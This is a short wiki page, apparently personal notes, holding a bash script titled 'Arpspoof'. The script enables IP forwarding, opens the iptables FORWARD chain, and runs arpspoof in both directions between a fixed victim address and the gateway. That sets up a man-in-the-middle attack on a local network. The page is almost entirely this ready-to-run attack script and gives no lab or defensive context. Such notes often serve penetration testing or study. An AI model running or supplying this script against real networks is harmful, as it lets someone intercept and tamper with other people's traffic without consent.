User Tools

Site Tools


arpspoof

Arpspoof

#!/bin/bash
victim=192.168.18.100
gw=192.168.18.254
 
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -I FORWARD -j ACCEPT
 
arpspoof -t $victim $gw & 
arpspoof -t $gw $victim &
arpspoof.txt · Last modified: 2021/06/12 11:02 by baumi

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki